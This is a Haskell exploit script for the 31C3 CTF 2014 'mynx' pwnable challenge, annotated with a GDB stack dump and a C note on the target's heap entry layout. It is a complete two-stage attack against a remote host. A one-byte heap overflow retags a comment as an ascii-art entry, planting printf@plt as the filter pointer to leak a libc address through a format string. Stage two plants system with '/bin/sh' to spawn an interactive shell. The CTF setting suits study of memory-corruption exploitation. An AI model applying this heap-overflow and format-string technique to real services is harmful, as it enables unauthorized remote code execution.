#!/usr/bin/env stack
-- stack --stack-yaml ./stack.yaml runghc --package pwn
-- 31C3 CTF: mynx
-- https://github.com/ctfs/write-ups-2014/tree/master/31c3-ctf-2014/pwn/mynx
-- tested env (the printf@plt address and libc offsets below were taken from this build; recompute them for any other binary/libc):
-- $ cat /etc/os-release
-- NAME="Ubuntu"
-- VERSION="16.04.3 LTS (Xenial Xerus)"
-- ...
--
-- $ sha1sum /lib/i386-linux-gnu/libc.so.6
-- 4fbb4b71ac6585eb0fa8f60b902a39f29da3fd34 /lib/i386-linux-gnu/libc.so.6
{-# LANGUAGE OverloadedStrings #-}
import Control.Monad
import Data.Bits
import qualified Data.ByteString.Char8 as BS
import Data.Maybe
import Data.Monoid ((<>))
import Numeric (showHex, readHex)
-- https://github.com/Tosainu/pwn.hs
import Pwn
-- | Render any 'Show'able value as a strict 'BS.ByteString'; used to turn
-- numeric menu answers (entry ids) into bytes for the connection.
showByteString :: (Show a) => a -> BS.ByteString
showByteString x = BS.pack (show x)
-- | The three ascii-art filters offered by the target's "add" menu, in menu
-- order: 'addAA' in 'main' answers the filter prompt with 0, 1 or 2 for
-- 'INVERT', 'LOLOLO' and 'CASEINV' respectively.  The exploit only ever
-- picks 'INVERT'.
data Filter = INVERT | LOLOLO | CASEINV
  deriving (Eq, Show)
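-- | Exploit driver for 31C3 CTF "mynx".
--
-- Stage 1 turns a comment into an ascii-art entry whose "filter" function
-- pointer is printf@plt, so "3.) apply filter" runs printf on text we
-- control: a format string that leaks main's return address inside
-- __libc_start_main, from which the libc base is computed.  Stage 2 repeats
-- the trick with the filter pointer set to libc's system and "/bin/sh" as
-- the text.
--
-- The retagging relies on a one-byte overflow of a comment: the comment
-- field holds 0xfb bytes, so the 0xfc-th byte we send lands just past the
-- entry, on the `type` tag of the (presumably adjacent) next heap entry.
--
-- Host, port, printf@plt and the libc offsets are hard-coded for the binary
-- and the libc listed in the header comment; the libc offsets must be
-- recomputed for any other build.
main :: IO ()
main = do
  r <- remote "192.168.122.10" 4000
  let printf_plt       = 0x08048420   -- printf@plt in the target binary
      libc_system'     = 0x0003ada0   -- offset of system from the libc base
      libc_start_main' = 0x00018540   -- offset of __libc_start_main from the libc base

  -- Menu drivers.
  let -- 1.) add an ascii art with filter f; the body a is sent without a newline.
      addAA f a = do
        recvuntil r "0.) quit\n> "
        sendline r "1"
        recvuntil r "2.) case inversion filter\n> "
        case f of
          INVERT  -> sendline r "0"
          LOLOLO  -> sendline r "1"
          CASEINV -> sendline r "2"
        recvuntil r "enter your ascii art >>>\n"
        send r a
      -- 3.) open ascii art i, 1.) add comment c (sent without a newline), 0.) back.
      addComment i c = do
        recvuntil r "0.) quit\n> "
        sendline r "3"
        recvuntil r "enter ascii art id\n> "
        sendline r $ showByteString i
        recvuntil r "0.) back\n> "
        sendline r "1"
        recvuntil r $ "enter your comment for no. " <> showByteString i <> "\n> "
        send r c
        recvuntil r "0.) back\n> "
        sendline r "0"
      -- 3.) open ascii art i, 2.) remove its comments, 0.) back.
      removeComments i = do
        recvuntil r "0.) quit\n> "
        sendline r "3"
        recvuntil r "enter ascii art id\n> "
        sendline r $ showByteString i
        recvuntil r "0.) back\n> "
        sendline r "2"
        recvuntil r "0.) back\n> "
        sendline r "3" `seq` sendline r "0"
      -- 3.) open ascii art i, 3.) apply its filter -- this is the call through
      -- the (overwritten) filter pointer.  Stays in the sub-menu so the caller
      -- can read whatever the call prints.
      applyFilter i = do
        recvuntil r "0.) quit\n> "
        sendline r "3"
        recvuntil r "enter ascii art id\n> "
        sendline r $ showByteString i
        recvuntil r "0.) back\n> "
        sendline r "3"
      -- Pack a 32-bit pointer or abort.  'p32' yields Nothing when it cannot
      -- pack the value (presumably out of range); silently dropping it, as
      -- 'catMaybes' would, sends a payload with the wrong layout.
      packPtr what v = maybe (fail ("p32 failed for " ++ what)) pure (p32 v)

  -- Heap set-up: entries 1 and 2, with a comment on 1.  This ordering is what
  -- the overflows below depend on (presumably it decides which chunks end up
  -- adjacent), so change it only together with them.
  addAA INVERT "nyan"
  addComment 1 "myon"
  addAA INVERT "fee"

  -- Stack at the "apply filter" call site, used to pick the printf argument
  -- index for the leak:
  -- gef➤ p $eip
  -- $1 = (void (*)()) 0x8048b3c
  -- gef➤ x/36xw $esp
  -- 0xffece850: 0x08b8c311 0x00000000 0xffece878 0x08048af5
  -- 0xffece860: 0x00000001 0xffece924 0xffece92c 0x08b8c309
  -- 0xffece870: 0xf77523dc 0xffece890 0x00000000 0xf75b8637 <- return addr
  -- 0xffece880: 0xf7752000 0xf7752000 0x00000000 0xf75b8637
  -- 0xffece890: 0x00000001 0xffece924 0xffece92c 0x00000000
  -- 0xffece8a0: 0x00000000 0x00000000 0xf7752000 0xf7788c04
  -- 0xffece8b0: 0xf7788000 0x00000000 0xf7752000 0xf7752000
  -- 0xffece8c0: 0x00000000 0xf35e5f74 0x9d849165 0x00000000
  -- 0xffece8d0: 0x00000000 0x00000000 0x00000001 0x080484d0
  -- gef➤ x/i 0xf75b8637
  -- 0xf75b8637 <__libc_start_main+247>: add esp,0x10

  -- Stage 1: leak.  Comment 2 starts with printf@plt: once the entry is
  -- retagged as ascii art those four bytes sit at +0x05, the filter pointer,
  -- and the rest becomes the ascii-art text, i.e. printf's format string.
  -- %11$08x prints printf's 11th stack argument: the slot that, per the dump
  -- above, holds __libc_start_main+247 (main's return address).
  filterPtr <- packPtr "printf@plt" printf_plt
  addComment 2 (filterPtr <> "return address is: %11$08x")
  removeComments 1
  -- 0xfb bytes fill comment 1; the 0xfc-th byte overflows into the next
  -- entry's type tag.  0x00 deletes ascii art 2 ...
  addComment 1 $ BS.replicate 0xfb 'A' <> "\x00"
  -- ... and 0x49 (the ascii-art tag) retags the 2nd comment as ascii art.
  addComment 1 $ BS.replicate 0xfb 'B' <> "\x49"

  info "leak informations"
  applyFilter 2
  recvuntil r "return address is: "
  leak <- recvn r 8
  -- Parse strictly: the leak must be exactly 8 hex digits.  A loose pattern
  -- such as `(l, _):_ = readHex ...` would accept a partial parse or die with
  -- an opaque pattern-match failure on unexpected output.
  l <- case readHex (BS.unpack leak) of
    [(v, "")] -> pure v
    _         -> fail ("unexpected leak, expected 8 hex digits: " ++ show leak)
  let libc_start_main = l - 247            -- see the `x/i` line in the dump above
      libc_base       = libc_start_main - libc_start_main'
  -- libc is mapped page-aligned, so a misaligned base means the leaked slot
  -- is not __libc_start_main+247 of the expected libc (other build, other
  -- stack layout).  Continuing would only produce a bogus system() address.
  when (libc_base .&. 0xfff /= 0) $
    fail ("libc base 0x" ++ showHex libc_base "" ++ " is not page-aligned: wrong libc or wrong leak slot?")
  success $ " libc_base: 0x" <> showHex libc_base ""
  recvuntil r "0.) back\n> "
  sendline r "0"

  -- Stage 2: the same retagging trick with system and "/bin/sh".
  addComment 2 "myon"
  addAA INVERT "nyan"
  sysPtr <- packPtr "system" (libc_base + libc_system')
  addComment 3 (sysPtr <> "/bin/sh\x00")
  removeComments 2
  -- delete ascii art 3 (type := 0x00) ...
  addComment 1 $ BS.replicate 0xfb 'A' <> "\x00"
  -- ... and retag the comment holding the system payload as ascii art, so
  -- that it is reachable as id 3 below.
  addComment 2 $ BS.replicate 0xfb 'B' <> "\x49"

  info "execute '/bin/sh'"
  applyFilter 3
  interactive r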
/*
 * One heap entry of the target binary, as recovered for the exploit (a
 * reference note, not compiled).  The first offset in each comment is from
 * the start of the entry, the second from the start of the union.  Both
 * variants are 0x100 bytes (1 + 4 + 4 + 0xf7 and 1 + 4 + 0xfb).  The offsets
 * describe the binary's packed layout; this declaration as written is not
 * packed, so a real compiler would insert padding after `type`.
 */
struct ascii_art_ {
  uint8_t type; // +0x00 (0x49: aa, 0x37: comment) -- the exploit rewrites this tag via a 1-byte overflow from the previous entry's comment
  union {
    struct ascii_art {
      uint32_t entry_no; // +0x01 +0x00
      void* filter; // +0x05 +0x04 -- presumably what "3.) apply filter" calls: the exploit plants printf@plt / system here and triggers it from that menu item
      char ascii_art[0xf7]; // +0x09 +0x08 -- the exploit's payloads suggest this is the filter's argument (format string, "/bin/sh")
    };
    struct comment {
      uint32_t entry_no; // +0x01 +0x00
      char comment[0xfb]; // +0x05 +0x04 -- ends at +0x100: a 0xfc-byte comment writes one byte into the next entry's `type` if entries are adjacent
    };
  };
};
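/*
 * Per-id repository of entries.  `ascii_arts` presumably points at this id's
 * entries (the malloc note below suggests 16 pointer-sized slots) and `count`
 * is the number in use.  The closing `;` was missing in the original note.
 */
struct ascii_art_repo {
  struct ascii_art_* ascii_arts;
  uint32_t count;
};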
// 0x804a900 -- address of the global repository table in the target binary
// (8 repositories; reference note, not code the exploit compiles)
struct ascii_art_repo ascii_art_repos[8];
// How the binary sizes a repository's entry array: 16 pointer-sized slots.
// This is a note on the target's allocation, not a valid file-scope statement.
malloc(sizeof(struct ascii_art*) * 16);